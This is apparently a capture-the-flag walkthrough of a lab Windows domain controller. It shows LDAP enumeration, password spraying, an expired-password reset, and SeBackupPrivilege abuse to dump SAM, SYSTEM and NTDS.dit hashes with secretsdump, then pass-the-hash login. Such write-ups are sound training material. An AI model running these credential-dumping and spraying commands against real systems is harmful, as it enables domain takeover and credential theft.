In this walk through, we will be going through the Baby room from Vulnlab. This room is rated as Easy on the platform and it consist of extensive LDAP Enumeration to get potential password. Spraying of it reveals STATUS_PASSWORD_MUST_CHANGE error which have to be abused to get initial foothold. For Privilege Escalation, abuse of SeBackupPrivilege is required to get root. So, let’s get started without any delay.
Table of Contents
Machine Info:
Title | Baby |
IPaddress | 10.10.88.179 |
Difficulty | Easy |
OS | Windows |
Description | Baby is an Easy Windows machine that requires extensive LDAP Enumeration to get potential password. Spraying of it reveals STATUS_PASSWORD_MUST_CHANGE error which have to be abused to get initial foothold. For Privilege Escalation, abuse of SeBackupPrivilege is required to get root. |
Enumeration:
- I started off with a regular nmap scan along with all TCP port scan and UDP scan. Found multiple ports opened – 88 (Kerberos), 135 (RPC), 139/445 (SMB), 389 (LDAP) and many more.
$ sudo nmap -sV -sC 10.10.88.179 [sudo] password for wh1terose: Starting Nmap 7.80 ( https://nmap.org ) at 2024-04-20 23:50 IST Nmap scan report for 10.10.88.179 Host is up (0.25s latency). Not shown: 988 filtered ports PORT STATE SERVICE VERSION 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-04-20 18:21:39Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 3389/tcp open ms-wbt-server Microsoft Terminal Services | rdp-ntlm-info: | Target_Name: BABY | NetBIOS_Domain_Name: BABY | NetBIOS_Computer_Name: BABYDC | DNS_Domain_Name: baby.vl | DNS_Computer_Name: BabyDC.baby.vl | Product_Version: 10.0.20348 |_ System_Time: 2024-04-20T18:21:49+00:00 | ssl-cert: Subject: commonName=BabyDC.baby.vl | Not valid before: 2024-04-19T18:19:35 |_Not valid after: 2024-10-19T18:19:35 |_ssl-date: 2024-04-20T18:22:28+00:00; -1s from scanner time. 5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Service Unavailable Service Info: Host: BABYDC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2024-04-20T18:21:50 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 220.16 seconds
$ sudo nmap -p- -T5 10.10.88.179 [sudo] password for wh1terose: Sorry, try again. [sudo] password for wh1terose: Starting Nmap 7.80 ( https://nmap.org ) at 2024-04-20 23:51 IST Nmap scan report for 10.10.88.179 Host is up (0.17s latency). Not shown: 65515 filtered ports PORT STATE SERVICE 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap 445/tcp open microsoft-ds 464/tcp open kpasswd5 636/tcp open ldapssl 3268/tcp open globalcatLDAP 3269/tcp open globalcatLDAPssl 3389/tcp open ms-wbt-server 5357/tcp open wsdapi 5985/tcp open wsman 9389/tcp open adws 49664/tcp open unknown 49667/tcp open unknown 49668/tcp open unknown 49674/tcp open unknown 49675/tcp open unknown 58870/tcp open unknown 58959/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 320.17 seconds
$ sudo nmap -sU -T5 10.10.88.179 [sudo] password for wh1terose: Starting Nmap 7.80 ( https://nmap.org ) at 2024-04-20 23:51 IST Nmap scan report for 10.10.88.179 Host is up (0.17s latency). Not shown: 998 open|filtered ports PORT STATE SERVICE 123/udp open ntp 389/udp open ldap Nmap done: 1 IP address (1 host up) scanned in 66.98 seconds
- Added hostname to my /etc/hosts file.
PORT 135 (RPC)
- Tried to enumerate usernames using RPCclient but got nothing.
PORT 139/445 (SMB)
- Tried to list shares via Null session Authentication but got nothing.
PORT 389 (LDAP)
- Tried anonymous access on LDAP. Got a successful hit and dumped the username list of the domain.
ldapsearch -H ldap://10.10.88.179 -x -b "DC=baby,DC=vl" '(objectClass=User)' "sAMAccountName" | grep sAMAccountName
AS-REP roasting
- On the found usernames, i tried to perform AS-REP roasting to check if any of the have the Kerberos Pre-Authentiation disabled however found no luck.
- Next, dumped all the domain information of the users via LDAP. Got a password in the description of user Teresa Bell.
ldapsearch -x -b "DC=baby,DC=vl" -H ldap://10.10.88.179 "*"
Password: BabyStart123!
- To check if the password is correct or not and for which user, i sprayed it on the DC using crackmapexec but got 0 successful hit.
crackmapexec smb 10.10.88.179 -u usernames -p BabyStart123! --continue-on-success
- Back to the enumeration, i looked again at the LDAP result and found out that there are more users on the domain than i have already captured.
ldapsearch -x -b "DC=baby,DC=vl" -H ldap://10.10.88.179 "*" | grep "#"
- I sprayed the password again on the found usernames. Didn’t got a green flag this time as well. However, the password of the user “Caroline.Robinson” has to change.
PORT 5357 (HTTP)
- Next, looked into the running web server but the index page gives a Service Unavailable error.
Exploitation:
- As per the LDAP enumeration, i got a “STATUS_PASSWORD_MUST_CHANGE” error. Looked online for this and found out that we can change the password of the user if we have RDP enabled with NLA enabled. I confirmed this using the nmap script.
Resource: https://www.n00py.io/2021/09/resetting-expired-passwords-remotely/
sudo nmap 10.10.88.179 -p 3389 --script rdp-enum-encryption
- I tried to RDP into the server using rdesktop however the session failed. So, i moved ahead with another technique that leverages smbpasswd.
smbpasswd -r 10.10.88.179 -U Caroline.Robinson Old SMB password:BabyStart123! New SMB password:Password@123! Retype new SMB password: Password@123! Password changed for user Caroline.Robinson
- Changed the password of user Caroline with the above technique and confirmed it using crackmapexec. Got a green flag now.
crackmapexec smb 10.10.88.179 -u Caroline.Robinson -p "Password@123!"
- Next, i sprayed the creds on the WinRM service and it gives me a “Pwn3d” back.
crackmapexec winrm 10.10.88.179 -u Caroline.Robinson -p "Password@123!"
- Got access via Evil-WinRM and captured the user flag.
Privilege Escalation:
- I ran the below command and checked the groups and priv the current user is assigned to. Found an interesting entry of SeBackupPrivilege and Backup Operators group.
whoami /all
- Using the assigned privileges, i copied the SAM and SYSTEM files in my current directory. Next, downloaded both of them to our local machine.
reg save hklm\sam C:\Users\Caroline.Robinson\Desktop\sam reg save hklm\system C:\Users\Caroline.Robinson\Desktop\system
- Used secretsdump on the downloaded files to dump the contents within in, revealing the Administrator’s hash.
secretsdump.py -sam sam -system system LOCAL
Administrator: 8d992faed38128ae85e95fa35868bb43
- Next, I tried to Log into the DC using the Admin hash using Pass-the-hash technique with psexec but it failed. That means, the admin hash we have is of local admin instead of the domain admin.
- So, in order to dump the Domain Admins hash, we will be requiring the NTDS.dit file. To do this, we will create a copy of the C drive and copy the required file with robocopy.
# Set up this shit in temp directory echo "set context persistent nowriters" | out-file ./diskshadow.txt -encoding ascii echo "add volume c: alias temp" | out-file ./diskshadow.txt -encoding ascii -append echo "create" | out-file ./diskshadow.txt -encoding ascii -append echo "expose %temp% z:" | out-file ./diskshadow.txt -encoding ascii -append
- Once we are done with the diskshadow file setup. We will use the diskshadow utility to execute the commands and create a new disk.
diskshadow.exe /s c:\temp\diskshadow.txt
- Next, make backup of C drive using robocopy to our created disk named Z.
cd Z: cd windows cd ntds robocopy /b .\ C:\temp NTDS.dit
- Save system.bak file as well
cd C:\Temp reg.exe save hklm\system C:\temp\system.bak
- Download the files system.bak and NTDS.dit to our local machine and use secrets dump to dump the hashes within it.
secretsdump.py -ntds ntds.dit -system system.bak LOCAL
- At last, logged into the DC using Domain Admin hash and captured the root flag to mark the machine as complete.
evil-winrm.rb -i 10.10.88.179 -u Administrator -H ee4457ae59f1e3fbd764e33d9cef123d
Also Read: PG – Twiggy
Conclusion:
So that was “Baby” for you. We started off with a regular nmap scan and found multiple ports opened – 88 (Kerberos), 135 (RPC), 139/445 (SMB), 389 (LDAP) and many more. Next, dumped all the domain information of the users via LDAP. Got a password in the description of user Teresa Bell. Sprayed the password on the found usernames through LDAP Enumeration and got STATUS_PASSWORD_MUST_CHANGE error. Abused the same and changed the password of the user to get initial foothold. For Privilege Escalation, abuse of SeBackupPrivilege was done to dump the NTDS.dit and system.bak files which then was used to dump the hashes via secretsdump. At last, used the dumped admin hash to get root. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.